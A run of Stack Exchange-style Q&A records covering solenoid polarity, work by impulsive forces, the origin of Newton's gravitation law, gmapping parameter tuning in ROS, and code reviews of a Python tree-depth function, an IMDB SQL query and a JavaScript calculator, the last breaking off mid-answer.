Answer: The north and south poles of a solenoid depend on two factors: one, the direction of the current flow, and two, the direction of the winding (clockwise or counter-clockwise). Start by determining the positive pole of the power source (e.g. a battery), then the end of the solenoid that you are going to connect to it. Now, looking down the solenoid tube, determine the direction of the winding. If it is clockwise in relation to the positive wire, that end is the south pole; if anti-clockwise, it is the north pole. So, to summarize: the magnetic south pole is always clockwise in relation to the positive wire.
"domain": "physics.stackexchange",
"id": 49319,
"tags": "electromagnetism, magnetic-fields, conventions, vector-fields"
} |
Work done by non-continuous force | Question: How is work done really understood?
I know that $W=F\cdot d$. I am interested in the meaning of force here i.e.
Is it a continuous force applied throughout the displacement, like the case of pulling a trolley bag over displacement $d$? Or
can it be a non-continuous force, like the case of hitting a pool ball with $F$, after which the ball covers displacement $d$?
Answer: The formula $W=Fd$ gives you the work performed by a force $F$ which is acting constantly over a particle as it moves over a distance $d$. The distance that the particle moves after the force stops does not figure into the calculation of work done in any way whatsoever.
Thus, when you throw a ball in the air, you apply a certain upwards force $F_\mathrm{throw}$ over a distance $d_\mathrm{throw}$ of, say about one meter, then during your interaction with the ball you perform the work $F_\mathrm{throw}d_\mathrm{throw}$. The ball then rises to a height $h$ under the action of gravity, which means that gravity performs a work $mgh$ in slowing the ball down to a stop.
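As a rough numerical sketch of the throw described above (the specific numbers are my own assumptions, not from the answer), one can estimate the rise height from $W = F_\mathrm{throw} d_\mathrm{throw} = mgh$, neglecting the work gravity does during the throw itself:

```python
m = 0.25   # ball mass in kg (assumed)
F = 30.0   # average upward force during the throw, in N (assumed)
d = 1.0    # distance over which the hand pushes the ball, in m
g = 9.81   # gravitational acceleration, m/s^2

W = F * d          # work done on the ball during the throw, in J
h = W / (m * g)    # height at which gravity has removed that energy, in m

print(f"work done: {W:.1f} J, rise height: {h:.1f} m")
```

With these numbers the ball would rise roughly twelve metres; the point is only that the work is fixed by the force and the distance over which it acts, not by anything that happens afterwards.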
With this in mind, the concept of a 'non-continuous force', like the impulsive force felt by a billiard ball when it bounces off of a hard wall, is only an approximation. In any situation like this, there is always some range of motion (often an elastic deformation of one of the bodies involved) which gets neglected, but if you want a full account of the work involved then you need to drop that approximation.
That said, though, the force involved in hitting a billiard ball with a cue is not in this 'non-continuous' class. The impact between the cue and the ball takes a finite (if short) time and covers a finite (if short) distance, so there is no problem in calculating the work performed. | {
"domain": "physics.stackexchange",
"id": 90398,
"tags": "forces, work, definition"
} |
Derivation of Newton's law of gravitation | Question: How did Newton get $F=\frac{Gm_1m_2}{r^2}$?
What is intuition behind it?
What kind of experiment or thought experiment can I do to derive this?
Answer: I'd recommend you read Book III of the Principia by Newton. There he sets out a careful proof based on some methodological rules and observations about planetary and satellite orbits. You might also read Feynman's chapter 7 from book 1 of the Lectures on Physics. He gives a bit more of an intuitive characterization of what is going on in Newton's proposition IV in his proof of universal gravity. The rest of Newton's proof is straightforward.
"domain": "physics.stackexchange",
"id": 71507,
"tags": "newtonian-mechanics, forces, newtonian-gravity, orbital-motion, celestial-mechanics"
} |
How to make better maps using gmapping? | Question:
I'm rather new to ROS and using ROS with SLAM for the first time. I'm using a Hokuyo LIDAR and the gmapping package. My maps don't look very good. Specifically, there are two points I'm interested in:
I've adjusted all the gmapping parameters that I can understand (update intervals, laser range, and map resolution--although I'm not even sure I know what map resolution does) but I'm wondering if some of the other parameters are playing a large part in the quality of my maps. Can someone link me to some resources that can help me understand the other parameters better?
The map seems to be changing around the robot such that it only displays what the robot is currently seeing. My understanding was that gmapping worked like this, with the robot sort of moving around a fixed map. What are some steps I can take to get my mapping to operate as it does in that video?
To recap: I'd like to make nice, clean maps, but mine seem very cluttered with particles everywhere (perhaps adjusting some filtering parameter can help here) and my map moves around the robot, not the other way around. Can anyone with some more SLAM experience help me out? I'd be happy to post some screenshots of my maps or provide any other info as needed. Thanks!
Originally posted by Ryan_F on ROS Answers with karma: 71 on 2017-08-21
Post score: 1
Original comments
Comment by achmad_fathoni on 2018-06-09:
Do you find any resource about better explanation of gmapping parameters?
Answer:
I use a SICK laser scanner and use the default params for gmapping with very good results. I get the best results, however, when I drive around and turn slowly. It can take quite some time (> 45 minutes) to map a large space (> 2000 sq ft) with lots of pathways.
Now, slowly can mean different things for different people (or robots), but roughly it takes a few minutes / 100 sq ft. It also helps to go over problem areas a couple of times.
You may find that the first time you went over an area it doesn't look that great but after the second time it gets adjusted and looks better.
As for finding the right parameters for your robot, this can be more of an art than a science at times. However, if you record your laser scans in a bag file then run gmapping you'll be able to properly tune your system much more systematically and efficiently (by changing the params on the same data until you get optimal results).
In the book Programming Robots with ROS (pg 146), it is suggested to try playing with the following params first:
/slam_gmapping/angularUpdate to 0.1
/slam_gmapping/linearUpdate to 0.1
/slam_gmapping/lskip to 10
/slam_gmapping/xmax to 10
/slam_gmapping/xmin to -10
/slam_gmapping/ymax to 10
/slam_gmapping/ymin to -10
For more parameters and further explanation of the parameters that I listed, check out gmapping on the wiki.
In the video RViz is being used to display the map that gmapping is publishing to the map topic with map set as the fixed frame. If your map is moving around the robot then you probably have the fixed frame set to base_link (or equivalent for your robot).
Originally posted by jayess with karma: 6155 on 2017-08-21
This answer was ACCEPTED on the original site
Post score: 3
Original comments
Comment by gvdhoorn on 2017-08-22:
It might also be worthwhile to look into other mapping components, such as Google Cartographer (in 2D mode). That's not an answer to "how do I improve my gmapping", but gmapping is quite old already, so it might pay to look at more recent developments.
Comment by Ryan_F on 2017-08-25:
Thank you this turned out to be perfect advice! The speed at which i was operating the robot was a large factor in the mapping error. I will look into newer mapping components as well.
Comment by jayess on 2017-08-25:
Great. Glad it helped.
Comment by aarontan on 2018-05-20:
Could you please elaborate on what you mean by "if you record your laser scans in a bag file then run gmapping you'll be able to properly tune your system much more systematically and efficiently (by changing the params on the same data until you get optimal results)"?
Thanks,
Aaron
Comment by jayess on 2018-05-20:
If you use live data to tune your system then you'll get different results each time, even with the same parameters. If you use the same data, then different results are from the parameters being changed and not the different data. | {
"domain": "robotics.stackexchange",
"id": 28664,
"tags": "ros, slam, navigation, 2d-mapping, gmapping"
} |
At the crossing point of two EM waves - do we have two photons? | Question: At the crossing point of two EM waves - do we have two photons?
Is every single "point" of the wave's occupied volume a potential photon?
Also, can a photon be viewed as "the cross-section" of a radiating EM wave?
Answer:
At the crossing point of two EM waves - do we have two photons?
Short answer: you ask an impossible question but... Kind of.
Wave-particle duality is notoriously hard to interpret. The delayed choice experiment and the HOM effect both show rather clearly that one cannot just establish a 1:1 mapping between waves and particles and use them interchangeably. Nearly everything that follows is an oversimplification of some kind, and there is a heated debate to this day about the right way of thinking about all this.
Ask yourself this: could you construct a single EM wave such that at any point in time you could look at it and say "there are exactly two photons with such and such energies at this point in space"? Generally speaking, the answer would be no: one can only decisively note something about individual photons when they interact with matter. One could not even create your proposed experimental setup with coherent single-photon sources. But, for what it is worth, if there somehow existed two single-photon wave packets overlapping in a certain region of space and time and someone put a detector there, they would indeed be able to detect two photons. With some probability. Or maybe none - see the HOM effect above. In the setup of your question, Delbrück scattering is also an interesting thing to consider: photons actually can interact with each other!
All in all, quantum mechanics is all about statistical qualities and probabilities, and that mindset might be hard to adopt. When considering an individual particle level, preface all your judgements with "with some probability, what we observe would be X": this is the only way the wave-particle duality works.
Is every single "point" of the wave's occupied volume a potential photon
Also, can a photon be viewed as "the cross-section" of a radiating EM wave?
EM waves are composed of wave packets; they are not just sine waves (for the purposes of quantization, anyway). See above for how they relate to statistical quantities: in a typical real-world scenario, the number of photons coming from a light source is huge, which is why we treat a technically discrete Planck distribution as a continuous one.
If you are interested in learning more, I would recommend finding some popular lectures on QED (Feynman's "QED: The Strange Theory of Light and Matter" might be a bit hard, but I do not happen to know a better book for beginners, unfortunately). | {
"domain": "physics.stackexchange",
"id": 86015,
"tags": "photons"
} |
Efficient way of flat mapping a range of a multidimensional random access collection | Question: I've recently answered a question about reading elements from an array of arrays. A way it could be interpreted is that the OP wanted to read a range that could span over multiple subarrays of the 2D array like so :
let a = [["5", "3", ".", ".", "7", "."],
["6", ".", ".", "1", "9", "5"]]
a.lazy.flatMap{$0}[1..<7] // ["3", ".", ".", "7", ".", "6"]
This way of reading a range would need to flatMap at least all the arrays preceding the lower bound of the range, which would be wasteful.
A more natural way would be to only read the needed elements from the original array:
func get<T>(_ range: Range<Int>, from array2d: [[T]]) -> [T]? {
var result: [T] = []
result.reserveCapacity(range.upperBound - range.lowerBound)
var count1 = 0
//Get the index of the first element
guard var low = array2d
.firstIndex(where: {
count1 += $0.count
return range.lowerBound < count1 }),
count1 != 0
else { return nil }
let before = count1 - array2d[low].count
var count2 = before
//Get the index of the last element in the range
guard let high = array2d[low..<array2d.endIndex]
.firstIndex(where: {
count2 += $0.count
return range.upperBound <= count2
}),
count2 != 0
else { return nil }
//Append the elements in the array with the low index
for i in (range.lowerBound - before)..<min(range.upperBound - before, array2d[low].count) {
result.append(array2d[low][i])
}
//If the range spans over multiple arrays
if count1 < count2 {
low += 1
//Append the elements in the arrays with an index between low and high
while low < high {
result.append(contentsOf: array2d[low])
low += 1
}
//Append the elements in the array with the high index
for i in 0..<(range.upperBound - count2 + array2d[high].count) {
result.append(array2d[high][i])
}
}
return result
}
Which could be used like so :
let a = [["0", "1", "2", "3", "4", "5"], ["6", "7"], [], ["8","9","10","11", "12"], ["13","14", "15"]]
get(5..<11, from: a) //Optional(["5", "6", "7", "8", "9", "10"])
get(7..<9, from: a) //Optional(["7", "8"])
To me, the above code feels... on the border of sanity/maintainability.
What I'd like to do is to make it more generic, maybe as an extension to RandomAccessCollection, and making the flattening process recursive for arrays/collections of arbitrary dimensions. I'm stuck here and not sure if this is the appropriate network to ask such a question.
Feedback on all aspects of the code is welcome, such as (but not limited to):
Efficiency,
Readability,
Naming.
Answer: I gather that your intent was to write a method that iterates through an array of arrays (but avoiding functional patterns), flattening the results in the process such that given...
let a = [["0", "1", "2", "3", "4", "5"], ["6", "7"], [], ["8","9","10","11", "12"], ["13","14", "15"]]
... the result for 5..<10 would be ["5", "6", "7", "8", "9"]
Assuming that’s what you were trying to do, I think you can simplify it:
extension Array {
func flattened<T>(range: Range<Int>) -> [T]? where Element == Array<T> {
var result: [T] = []
var offset = range.startIndex
var length = range.upperBound - range.lowerBound
result.reserveCapacity(length)
for subarray in self {
let subarrayCount = subarray.count
if offset < subarrayCount {
if length > subarrayCount - offset {
result += subarray[offset...]
length -= subarrayCount - offset
} else {
return result + subarray[offset..<offset + length]
}
}
offset = Swift.max(0, offset - subarrayCount)
}
return nil
}
}
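For comparison, the same single-pass idea can be sketched in Python (my own port of the Swift above, not part of the original answer):

```python
def flattened(array2d, start, stop):
    """Return elements [start, stop) of the conceptually flattened array2d, or None."""
    result = []
    offset = start
    length = stop - start
    for subarray in array2d:
        n = len(subarray)
        if offset < n:
            if length > n - offset:
                # The range continues past this subarray: take its tail.
                result.extend(subarray[offset:])
                length -= n - offset
            else:
                # The range ends inside this subarray.
                return result + subarray[offset:offset + length]
        offset = max(0, offset - n)
    return None  # the range extends past the flattened collection

a = [["0", "1", "2", "3", "4", "5"], ["6", "7"], [],
     ["8", "9", "10", "11", "12"], ["13", "14", "15"]]
print(flattened(a, 5, 10))  # ['5', '6', '7', '8', '9']
```

Each subarray is visited at most once, and subarrays entirely before the range only cost a length check, which is the same work-saving property as the Swift version.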
In terms of observations on your code:
I wouldn't advise the get method name. It's not a very meaningful name and only conjures up confusion with getters. I'd go with something that captures the "flattening" nature of the routine.
As a general rule, we should avoid closures with side-effects in functional programming patterns. Even though you’ve written an “iterative” rendition of the OP’s code, you’re using a functional method, firstIndex, and you are updating variables outside the closure. It’s technically allowed but is contrary to the spirit of functional programming patterns and is dependent upon the implementation details of firstIndex. | {
"domain": "codereview.stackexchange",
"id": 41781,
"tags": "performance, array, swift, collections"
} |
Does earth itself emit electromagnetic waves? | Question: (.... and if so, of what frequency and amplitude)?
This Skeptics.SE question about nonsense called 'geopathic stress' made me wonder if and how earth itself emits electromagnetic waves.
We need moving charges for that, and I can hardly imagine that things like moving magma or 'moving' radioactive minerals would 'emit' anything, but maybe I'm missing something?
I'm not asking about atmospheric phenomena, or about externally introduced electrical currents (man made, lightning).
Answer: Yes, the earth emits electromagnetic radiation.
It emits infrared radiation with wavelengths of about 1 µm to 1 mm. This is heat, essentially, and much of it radiates into space.
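As a quick sanity check of that wavelength range (a back-of-the-envelope addition of mine, not from the original answer), Wien's displacement law puts the peak of Earth's thermal emission near 10 µm for a mean surface temperature of about 288 K:

```python
b = 2.897771955e-3   # Wien's displacement constant, m*K
T = 288.0            # approximate mean surface temperature of Earth, K

peak_m = b / T            # peak emission wavelength, in metres
peak_um = peak_m * 1e6    # the same wavelength in micrometres

print(f"peak thermal emission wavelength: {peak_um:.1f} um")
```

A peak around 10 µm sits comfortably inside the quoted 1 µm to 1 mm band.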
Most if not all of the earth's rocks are radioactive (e.g. because of minerals containing isotopes in the uranium and thorium decay chains, as well as potassium-40) and emit gamma radiation with wavelengths around $10^{-12}$ m. I'm not sure how much of this radiation would make it through the atmosphere.
You said you're not interested in atmospheric phenomena, but I wonder what the relative contributions of subsurface and atmosphere (e.g. the auroral kilometric radiation), as well as manmade sources, would be to the total signature. The planets emit radio waves (ask a radio astronomer), but I suspect most of that energy is from their atmospheres, since Jupiter and Saturn are especially bright. This book by Vázquez, Pallé and Montañés Rodríguez (2010; Springer) looks like it might address some of this, e.g. in Chapter 4. | {
"domain": "earthscience.stackexchange",
"id": 480,
"tags": "electromagnetism"
} |
expected running time of Randomwalk for k-SAT | Question: Model: the gambler's ruin theorem.
A gambler has $i$ coins initially; in every step, he wins a coin with probability $p$ and loses a coin with probability $1-p$. The expected time until he loses all his coins or wins $n-i$ more coins (so that he has $n$ coins in total) is the following:
$$E(i)=-\frac{n}{1-2p}\frac{\left(\frac{1-p}{p}\right)^i-1}{\left(\frac{1-p}{p}\right)^n-1}+\frac{i}{1-2p}$$
this result is from p272 of https://www.emis.de/journals/AMEN/2018/AMEN-171010.pdf
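The closed form can be checked numerically against the defining recurrence $E(i) = 1 + pE(i+1) + (1-p)E(i-1)$ with boundary conditions $E(0)=E(n)=0$ (a small sketch of my own, assuming $p \neq 1/2$):

```python
def expected_time(i, n, p):
    """Expected absorption time of the biased gambler's ruin walk (requires p != 1/2)."""
    r = (1 - p) / p
    return i / (1 - 2 * p) - (n / (1 - 2 * p)) * (r**i - 1) / (r**n - 1)

n, p = 10, 1 / 3
# Absorbed immediately at the barriers 0 and n.
assert abs(expected_time(0, n, p)) < 1e-9
assert abs(expected_time(n, n, p)) < 1e-9
# The one-step recurrence holds at every interior state.
for i in range(1, n):
    lhs = expected_time(i, n, p)
    rhs = 1 + p * expected_time(i + 1, n, p) + (1 - p) * expected_time(i - 1, n, p)
    assert abs(lhs - rhs) < 1e-9
print("closed form matches the recurrence")
```

Note that for $p < 1/2$ the ratio term is exponentially small, so $E(i) \approx i/(1-2p)$, which is where the $O(n)$ figure below comes from.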
K-SAT problem
https://cstheory.stackexchange.com/questions/1196/what-is-the-k-sat-problem
Assume that there are $n$ variables in K-SAT.
I use $X=(x_1, x_2, \dots, x_n)$ to denote a candidate solution of K-SAT.
$X$ is a vector of $n$ dimensions.
$x_i=1$ means the i-th variable is true, $x_i=0$ means the i-th variable is false.
The algorithm:
Applying the gambler's ruin theorem to the analysis:
Assume there is a unique solution $X^*$, and that the initial solution $X$ generated by the algorithm agrees with the unique solution $X^*$ in $i$ bits.
Apparently, when $i$ becomes $0$ or $n$, the algorithm will stop, and I want to calculate the expected number of iterations before it stops.
In each iteration, the number of matching bits can decrease or increase by 1,
and the probability that it increases by 1 is at least $p=1/k$.
(Because it's k-SAT, in each unsatisfied clause there is at least one variable that doesn't match $X^*$.)
The number of matching bits between $X^*$ and $X$ increasing by 1 corresponds to the gambler winning a coin, and it decreasing by 1 corresponds to the gambler losing a coin.
Thus I think I can use
$$E(i)=-\frac{n}{1-2p}\frac{\left(\frac{1-p}{p}\right)^i-1}{\left(\frac{1-p}{p}\right)^n-1}+\frac{i}{1-2p}$$
to calculate the expected runtime.
But then the expected runtime is $O(n)$, which is impossible for the k-SAT problem.
My question is: where am I wrong?
Answer: The probability that step 4 brings $X$ closer to the unique satisfying assignment is not $1/k$. Rather, it is at least $1/k$. When $X$ is far away from a satisfying assignment, the probability is likely to be significantly larger. This makes it quite unlikely that you will ever get to a situation in which $Y$ is close to the unique satisfying assignment.
As a concrete illustration, consider the 2CNF containing all $\binom{n}{2}$ clauses of the form $x_i \lor x_j$ and all $2\binom{n}{2}$ clauses of the form $x_i \lor \bar{x}_j$. The only satisfying assignment has all variables positive. Suppose that the current assignment $X$ contains $d$ negative variables. There are $\binom{n}{2} - \binom{n-d}{2}$ unsatisfied clauses, one for each pair of variables, not both of which are positive. In $\binom{d}{2}$ of them, both literals are false, and in $d(n-d)$, one literal is false. Therefore, the probability that we flip a negative variable is
$$
\frac{\binom{d}{2} \cdot 1 + d(n-d) \cdot \frac{1}{2}}{\binom{d}{2} + d(n-d)} =
\frac{n-1}{2n-d-1} = \frac{1}{2} + \frac{d-1}{2(2n-d-1)}.
$$
When $d$ is linear in $n$, this probability is larger than $1/2$ by a constant.
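The closed form $(n-1)/(2n-d-1)$ can be verified by brute-force enumeration of the clauses in this 2CNF (a small check of my own, modelling the usual random-walk step: pick a uniformly random unsatisfied clause, then flip a uniformly random literal in it):

```python
from itertools import combinations, permutations

def flip_negative_probability(n, d):
    # Assignment with the first d variables False (negative), the rest True.
    x = [False] * d + [True] * (n - d)
    # All clauses x_i OR x_j (i < j) and all clauses x_i OR NOT x_j (i != j).
    clauses = [((i, True), (j, True)) for i, j in combinations(range(n), 2)]
    clauses += [((i, True), (j, False)) for i, j in permutations(range(n), 2)]
    value = lambda v, positive: x[v] if positive else not x[v]
    unsat = [c for c in clauses if not any(value(v, s) for v, s in c)]
    # Probability that the flipped variable is currently negative.
    return sum(sum(1 for v, _ in c if not x[v]) / len(c) for c in unsat) / len(unsat)

n, d = 8, 3
assert abs(flip_negative_probability(n, d) - (n - 1) / (2 * n - d - 1)) < 1e-12
print("enumeration matches the closed form")
```

For $n = 8$, $d = 3$ both sides equal $7/12$, strictly above $1/2$, matching the claim that the walk drifts toward the satisfying assignment when $d$ is large.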
If we repeat the same calculation for $k$CNFs (we have all clause of width $k$ in which at least one variable is positive), the value of $p$ that we get is
$$
\frac{\frac{1}{k} \sum_{\ell=1}^k \binom{d}{\ell} \binom{n-d}{k-\ell} \ell}{\sum_{\ell=1}^k \binom{d}{\ell} \binom{n-d}{k-\ell}} =
\frac{\frac{d}{k} \sum_{\ell=1}^k \binom{d-1}{\ell-1} \binom{n-d}{k-\ell}}{\sum_{\ell=1}^k \frac{d}{\ell} \binom{d-1}{\ell-1} \binom{n-d}{k-\ell}} =
\frac{\frac{1}{k} \binom{n-1}{k-1}}{\binom{n-d}{k-1} + \sum_{\ell=2}^k \frac{1}{\ell} \binom{d-1}{\ell-1} \binom{n-d}{k-\ell}}.
$$
This expression shows that when $d$ is small, the probability is indeed close to $1/k$. On the other hand, another expression is
$$
\frac{\frac{d}{k} \binom{n-1}{k-1}}{\binom{n}{k} - \binom{n-d}{k}} = \frac{\frac{d}{n} \binom{n}{k}}{\binom{n}{k} - \binom{n-d}{k}} \approx \frac{d}{n} \frac{n^k}{n^k - (n-d)^k} = \frac{d}{n} \frac{1}{1 - (1-d/n)^k}.
$$
When $d \approx \alpha n$ for $\alpha$ satisfying $\alpha/(1-(1-\alpha)^k) = 1/2$ (for example, when $k = 3$, we get $\alpha \approx 0.38$), $p$ crosses $1/2$, and so the algorithm will start improving the solution in expectation. Consequently, $X$ is unlikely to have much more than $0.39n$ negative variables.
When analyzing Schöning's algorithm, we keep track of the distance of $X$ from a fixed satisfying assignment. In the analysis, we say that the behavior of $X$ stochastically dominates a biased random walk with constant $p = 1/k$. This means that $X$ behaves better than such a random walk, and so if we show that a $1/k$-biased random walk hits its target with some probability $q$, then it follows that the actual algorithm also finds a satisfying assignment with probability $q$. | {
"domain": "cs.stackexchange",
"id": 19796,
"tags": "complexity-theory, time-complexity, runtime-analysis, satisfiability, random-walks"
} |
IMDB website query to find actors by time period | Question: I'm using data from a database from the IMDB website. The database consists of five relevant tables.
Actor (id, fname, lname, gender)
Movie (id, name, year, rank)
Director (id, fname, lname)
Cast (pid, mid, role)
Movie_Director(did, mid)
It's worth noting that the id column in Actor, Movie & Director tables is a key for the respective table.
Cast.pid refers to Actor.id, and Cast.mid refers to Movie.id.
Here's the prompt and my initial attempt at solving it. Any help in improving/speeding up the query would be greatly appreciated.
/* List all the actors who acted in at least
one film in 2nd half of the 19th century and
in at least one film in the 1st half of the 20th century */
SELECT DISTINCT a.fname, a.lname
FROM Actor a, Movie m1, Movie m2, Cast c1, Cast c2
WHERE c1.pid = a.id
AND c1.mid = m1.id
AND m1.year BETWEEN 1850 AND 1900
AND c2.pid = a.id
AND c2.mid = m2.id
AND m2.year BETWEEN 1901 AND 1950;
Answer: I see some of the same problems as in your last query
Do not use single-letter aliases
a, m1, c1... How about an alias that helps you write the query, instead of one that saves a few characters? That's what they are for, after all.
Old style JOIN
I think you would benefit from reading about explicit JOIN syntax instead of using the pre-ANSI-92 syntax.
Vertical white space
I personally find queries much easier to read if you use line breaks between lists of columns/values/conditions, instead of writing them inline.
Column aliases
It's good practice to rename short/ambiguous/ugly column names to something more human-friendly while presenting the result set. To you it may not matter much, but if you were presenting this report to your boss, they may scratch their head at fname and lname. The syntax for column aliases is the same as table aliases.
That Devil BETWEEN
BETWEEN is ambiguous. You should instead use logical operators.
This is about Microsoft T-SQL, but some problems apply pretty much across the board in SQL.
What do BETWEEN and the devil have in common?
I'll make no bones about it: BETWEEN is evil. For one, the meaning of the word in English does not always match the meaning of the operator in T-SQL. In T-SQL, BETWEEN is an inclusive range - not everyone gets that. Sure, in casual conversation when someone says "between 3 and 6" the answer really could be 3, 4, 5 or 6; but other times, they really mean to restrict the set to only 4 or 5 (an exclusive range).
The reviewed script
SELECT DISTINCT
Actor.fname AS ActorFirstName,
Actor.lname AS ActorLastName
FROM
Actor -- look no alias needed
INNER JOIN Cast AS OlderCast ON OlderCast.pid = Actor.id
INNER JOIN Movie AS OlderMovie ON OlderCast.mid = OlderMovie.id
INNER JOIN Cast AS NewerCast ON NewerCast.pid = Actor.id
INNER JOIN Movie AS NewerMovie ON NewerCast.mid = NewerMovie.id
WHERE
OlderMovie.year >= 1850
AND OlderMovie.year <= 1900
AND NewerMovie.year >= 1901
AND NewerMovie.year <= 1950; | {
"domain": "codereview.stackexchange",
"id": 9425,
"tags": "optimization, performance, sql, mysql"
} |
Best way to store the sum of all node depths? | Question: To sum up all the nodes' depths in any given binary tree, I've written the following recursive algorithm:
def nodeDepths(root):
final=[0]
helper(root,0, final)
return final[0]
def helper(node,d, final):
if not node:
return
final[0]+= d
helper(node.left,d+1, final)
helper(node.right,d+1, final)
class BinaryTree:
def __init__(self, value):
self.value = value
self.left = None
self.right = None
My thinking was: as I see each node, add the depth of that node to the final sum, then recursively call on the left and right with final list as an argument. At the end of the recursive call stack, final[0] should have the right value.
Is there a better way to do this? I have concerns about thread safety in general with global variables but is it a better practice to use global variables in this case?
Answer: PEP8
nodeDepths should be node_depths in snake_case.
Function naming
helper is not a helpful name for a function. If I were to guess what this does, it should maybe be called recurse_node_depths.
Instance methods
As it stands, BinaryTree does not deserve to have an __init__. It would be better-suited as a @dataclass or maybe a named tuple. That said, it probably makes more sense for node_depths to be an instance method where self replaces root.
Integer-by-reference
My first read of this code was wrong. final is only ever going to have one member. My guess is that you did this to effectively pass an integer by reference, but this is a gross hack. Instead, just return the evolving sum as an integer from your recursion, and the uppermost return will be the total that you need.
Slots
Another way to squeeze performance out of this is to initialize __slots__ for BinaryTree based on the three known members.
Recursion
Recursion is not a great idea in Python, for at least two reasons:
Given that there is no indication to the maximum depth of your input tree, you may blow the stack.
Since Python does not have tail-recursion optimization, recursion is slower than in some other languages.
So you should attempt to reframe this as an iterative implementation. | {
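Putting a few of these suggestions together, one possible iterative reframing (a sketch of my own, not the reviewer's definitive rewrite) replaces the call stack with an explicit stack of (node, depth) pairs:

```python
class BinaryTree:
    __slots__ = ("value", "left", "right")

    def __init__(self, value):
        self.value = value
        self.left = None
        self.right = None

def node_depths(root):
    """Sum of the depths of all nodes, iteratively (the root has depth 0)."""
    total = 0
    stack = [(root, 0)]
    while stack:
        node, depth = stack.pop()
        if node is None:
            continue
        total += depth
        stack.append((node.left, depth + 1))
        stack.append((node.right, depth + 1))
    return total

# Depths: root 0, its two children 1 each, one grandchild 2 -> total 4.
root = BinaryTree(1)
root.left, root.right = BinaryTree(2), BinaryTree(3)
root.left.left = BinaryTree(4)
print(node_depths(root))  # 4
```

This keeps the running sum as an ordinary return value (no single-element list) and cannot blow the interpreter's call stack on deep trees.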
"domain": "codereview.stackexchange",
"id": 38805,
"tags": "python, recursion, binary-tree"
} |
Vanilla JS calculator for learning coding fundamentals | Question: Since I am self taught, I would greatly appreciate some input on my code for this JS calculator:
What redundancies am I failing to see and remove?
How is my naming for vars and functions? Is it clear or vague?
How is my overall readability? Is what I'm writing clear, or is it hard to decipher?
Are my comments helpful or redundant?
What stands out to you that needs to be fixed the most?
Just FYI, this code won't run on its own, as I have not included the HTML/CSS that accompanies it. I would like to not worry about the front-end design in this particular post. All input is appreciated.
const buttons = ['CE', 'AC', 'x', '7', '8', '9', '/', '4', '5', '6',
'-', '1', '2', '3', '+', '0', '.', '='
];
var currentEntry = [],
totalEntry = [];
var equals = true;
//const testNum = /[0-9]/g;
const regexOperands = /[+\-\/x=]/;
const totalArea = document.getElementById("totalArea");
const currentArea = document.getElementById("currentArea");
const numberArea = document.getElementById("numberArea");
const faceHappy = document.getElementById("face-happy");
window.onload = () => {
makeButtons();
}
function applyClick(userInput) { //all our clicking behaviors for buttons
let btn = document.getElementById("b" + userInput);
btn.onclick = () => {
let totalAreaLength = totalArea.textContent.length;
//first we clear the face
changeDisplay(userInput);
if (equals) { //clear after =, or for first entry
if (!isNaN(userInput)) { //if there is pre-existing numbers after hitting equals then delete
currentArea.textContent = '';
} else {
//places total from previous calculation as first entry
currentArea.textContent = totalEntry;
}
totalArea.textContent = '';
currentEntry = [];
totalEntry = [];
equals = false;
}
//first we restrict input length to 17
if (currentArea.textContent.length > 17 || totalArea.textContent.length > 17) {
alert("Number Limit Reached!");
currentArea.textContent = "";
totalArea.textContent = "";
equals = true;
} else if (!isNaN(userInput)) { //test for number
equals = false;
currentArea.textContent = (currentArea.textContent == "0") ? userInput : currentArea.textContent + userInput;
} else if (isNaN(userInput)) { //**for all non numerics**\\
if (equals) { //restricts equals being pressed twice
return;
} else {
if (userInput === "=") { //to get answer
currentEntry = filterUserInput(userInput);
let saveUserInput = currentArea.textContent;
operateOnEntry(currentEntry);
equals = true;
totalEntry = currentEntry[0]; //will save answer for next calculation
currentArea.textContent = saveUserInput; //will display equation
totalArea.textContent = currentEntry; //will display answer
} else if (userInput === ".") {
let lastEntry = filterUserInput(userInput);
if (!lastEntry.includes(".")) { //test for pre-existing period
currentArea.textContent = currentArea.textContent + userInput;
}
} else if (userInput === "AC" || userInput === "CE") {
if (userInput === "AC") {
changeDisplay(userInput);
currentArea.textContent = "";
totalArea.textContent = "";
} else if (userInput === "CE") {
let clearedLastEntry = filterUserInput(userInput);
currentArea.textContent = clearedLastEntry.join('');
}
} else { //this is default operator behavior
let lastEntry = filterUserInput(userInput);
//limits operators from printing if there is a pre-existing operator as last user input
currentArea.textContent = (regexOperands.test(lastEntry)) ? currentArea.textContent : currentArea.textContent + userInput;
}
}
}
}
}
function operateOnEntry(userEntry) {
    //this is where the calculations occur when hitting =
    let a, b, c, index;
    if (userEntry.includes("x")) {
        index = userEntry.indexOf('x');
        a = Number(userEntry[index - 1]);
        b = Number(userEntry[index + 1]);
        c = a * b;
        userEntry.splice((index - 1), 3, c);
        return operateOnEntry(userEntry);
    } else if (userEntry.includes("/")) {
        index = userEntry.indexOf('/');
        a = Number(userEntry[index - 1]);
        b = Number(userEntry[index + 1]);
        c = a / b;
        userEntry.splice((index - 1), 3, c);
        return operateOnEntry(userEntry);
    } else if (currentEntry.includes("+") || currentEntry.includes("-")) {
        index = userEntry[1];
        a = Number(userEntry[0]);
        b = Number(userEntry[2]);
        console.log("index: " + index);
        if (index == '+') {
            c = a + b;
            userEntry.splice(0, 3, c);
            return operateOnEntry(userEntry);
        } else {
            c = a - b;
            userEntry.splice(0, 3, c);
            return operateOnEntry(userEntry);
        }
    }
    return userEntry;
}
function filterUserInput(userInput) {
    //this function converts the user input into an array
    let testCurrentEntry;
    if (userInput === ".") {
        testCurrentEntry = currentArea.textContent.split(regexOperands);
        return testCurrentEntry.pop();
    } else if (userInput === "=") {
        testCurrentEntry = currentArea.textContent; //.split(regexOperands)
        testCurrentEntry = testCurrentEntry.split(/([+\-\/x=])/g);
        return testCurrentEntry;
    } else if (userInput === "CE") {
        testCurrentEntry = currentArea.textContent.split("");
        testCurrentEntry.pop();
        return testCurrentEntry;
    } else {
        testCurrentEntry = currentArea.textContent.split('');
        return testCurrentEntry.pop();
    }
}
function changeDisplay(userInput) {
    numberArea.style.display = 'block';
    if (userInput == 'AC') {
        numberArea.style.display = 'none';
        faceHappy.style.display = "block";
    }
}
function makeButtons() {
    for (var i = 0; i < buttons.length; i++) {
        var btn = document.createElement("BUTTON");
        var t = document.createTextNode(buttons[i]);
        var container = document.getElementById('container');
        btn.id = "b" + buttons[i];
        btn.className = "button";
        btn.appendChild(t);
        container.appendChild(btn);
        applyClick(buttons[i]);
    }
}
Answer: Building reusable programs
Just FYI, this code won't run on its own, as I have not included the HTML/CSS that accompanies it. I would like to not worry about the front-end design in this particular post.
Therein lies the top advice I can give to you. Try this exercise:
